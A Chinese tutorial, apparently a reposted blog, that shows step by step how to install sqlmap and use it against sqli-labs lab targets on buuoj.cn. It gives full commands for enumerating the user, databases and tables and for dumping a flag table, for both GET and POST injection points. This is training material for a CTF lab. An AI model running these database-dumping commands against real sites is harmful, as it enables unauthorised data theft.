【史上最全sqlmap通关sqli-labs靶场教程】

这篇具有很好参考价值的文章主要介绍了【史上最全sqlmap通关sqli-labs靶场教程】。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

下载sqlmap地址:sqlmap: automatic SQL injection and database takeover tool

下载完成后解压在C盘或者D盘都行,自己别忘了就可以

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

解压后在目标文件夹下打开cmd,运行python sqlmap.py -h

运行后出现sqlmap的说明,表示安装成功

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

这里补充一下,-h其实不是完成的说明,-hh可以获得更多说明,

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

如果不在sqlmap的本目录下执行python sqlmap.py -h,这样是执行不成功的
怎么样才能快速的打开cmd窗口就能用sqlmap呢?
把sqlmap添加至环境变量

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

如果想运行sqlmap的时候起前面不加python,还要再加个变量
PATHEXT变量名里面添加:.PY;
添加完成后,关闭cmd窗口重新打开一个,输入sqlmap -h出现说明,表示成功

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

接下来开靶场进行实验:

https://buuoj.cn/

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

复制靶机地址到cmd窗口:
-u 执行url      ?id=1 指定传参点

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

第一次运行时,会询问注入探测等级和风险等级:-level   -risk
一般选择默认即可,继续输入:Y

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

再次询问:GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
GET参数“id”易受攻击。你想继续测试其他的(如果有的话)吗?[y / N]
这次输入:n

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

注入完成后,可以看到执行的注入类型以及payload有:布尔盲注、报错注入、时间盲注、union注入
最后还做了一个备份,复制打开地址
Log文件就是记录了有哪些注入漏洞

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

下面进行获取flag操作:
获取用户:root@localhost
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" --current-user

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

获取数据库:ctftraining
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" --dbs

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

获取表:flag、news、users
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" -D ctftraining --tables
-D指定数据库的范围,只注入ctftraining 这个库,注出来有哪些表

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

获取flag:flag{b76e1d78-cbcd-4a24-88b8-84e895acb7d1}
sqlmap -u "http://8f6332d9-5ca6-406f-a4ad-db0bdb660ad5.node4.buuoj.cn/Less-1/?id=1"  -D ctftraining -T flag --dump

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

尝试post型注入:Less-12

使用BP抓包获取post报文,保存在txt文件里
-r代表文档,文档内容就是你的post报文 --batch 自动选择yes
sqlmap -r post_sqlmap.txt --batch -dbs
获取到我们熟知的关键数据库:ctftraining

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

获取表:flag、news、users
sqlmap -r post_sqlmap.txt --batch -D ctftraining --tables

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

获取flag:flag{b76e1d78-cbcd-4a24-88b8-84e895acb7d1}
sqlmap -r post_sqlmap.txt --batch -D ctftraining -T flag --dump

sql-labs靶场,安全,web安全,sql,经验分享,安全威胁分析,网络安全,系统安全

至此结束!

关注我,随时留言交流~文章来源地址https://www.toymoban.com/news/detail-804375.html

到了这里,关于【史上最全sqlmap通关sqli-labs靶场教程】的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • sqli-labs靶场分析

    1、level1 单引号测试报错,为单引号闭合,且显示1多了个单引号故而为字符型注入。且未对用户输入进行任何过滤。 且SQL语句错误会输出,可以使用报错注入 order by判断表列数 uoion 联合查询,因为网页只显示第一张表的数据,因此需要union前的语句为假,查出数据为空,把位

    2024年02月07日
    浏览(54)
  • sqli-labs靶场安装

      服务器环境:phpstudy   下载链接:https://www.xp.cn/   Sqlilabs靶场:sqlilabs   下载链接:https://github.com/Audi-1/sqli-labs   PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。 支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,J

    2023年04月13日
    浏览(88)
  • sqli-labs关卡18(基于http头部报错盲注)通关思路

    此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!! 1、什么是http请求头 2、为什么http头部可以进行注入 这里我只演示sql注入常见的请求头内容。 1、user-agent User-Agent 首部包含了一个特征

    2024年02月05日
    浏览(43)
  • 基于Sqli-Labs靶场的SQL注入-17~22关

            首先我们进入这一关:         可以看到这一关让你进行“密码重置”,我们这里首先随便输入一个账户和密码进行测试。我这里用户名输入1,密码输入1。观察页面回显:         可以看到页面回显对我们很不友好,对于一个搞网安的,这能忍?         我们进

    2024年02月07日
    浏览(51)
  • 云服务器利用Docker搭建sqli-labs靶场环境

    一、安装宝塔面板 使用xshell、electerm、SecureCRT等远程终端连接登陆上云服务器,在Linux宝塔面板使用脚本安装 安装后,如下图:按照提示,在云服务器防火墙/安全组放行Linux宝塔面板的端口 在浏览器打开上述网址,登录Linux宝塔面板: 二、安装Docker 在Linux宝塔面板登陆后,在

    2024年02月10日
    浏览(52)
  • Sqli-labs-master超详细通关教程(1-23关|基础篇)

    一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ \\\'and1=2--+ \\\"and1=2--+ )and1=2--+ \\\')and1=2--+ \\\")and1=2--+ \\\"))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: ?id =1 and 1=2 页面正常,考虑是否

    2023年04月27日
    浏览(44)
  • SQLI-labs-第一关

    目录 知识点:单引号字符型注入 1、根据提示,为get注入,在url中输入内容​编辑  2、判断注入点  3、判断目前该表的字段数  4、判断回显位置 5、爆库名 6、爆表名   7、爆字段名  8、爆值 知识点:单引号字符型注入 思路: 1、根据提示,为get注入,在url中输入内容  

    2024年02月11日
    浏览(46)
  • sqli-labs例题复现

    less-1.1 在源码中$id=$_GET[\\\'id\\\'];之后加入如下代码: 1.分析正则 第一个b匹配select单词边界,sS匹配到所有字符,最后一个b匹配到from单词边界。 select...from被过滤,失效。 2.科学计数法的引入 如果可以存在一个,可以加在from前面,不会影响语句执行,从而实现绕过正则

    2024年02月10日
    浏览(48)
  • sqli-labs部分关思路

    目录 updatexml 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 25a 26 26a 27 27a 28 28a 问题:你了解sql注入吗 答:由于程序过滤不严谨,用户异常输入,这些输入会导致数据库异常查询,最终导致sql注入 mysql三种注释符: --+ # /**/ updatexml() 这个函数作用是替换数据,三个参数对应

    2024年02月09日
    浏览(44)
  • SQL-Labs靶场“11-15”关通关教程

    点击跳转: SQL-Labs靶场“1-5”关通关教程 SQL-Labs靶场“6-10”关通关教程 请求方式 注入类型 拼接方式 POST 联合、报错、布尔盲注、延时盲注 username=‘x’ 看见输入框了,说明该注入提交方式为POST,同时我们先寻找注入点: 在输入框中输入单引号: 我们可以看到产生了报错信

    2024年02月19日
    浏览(70)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包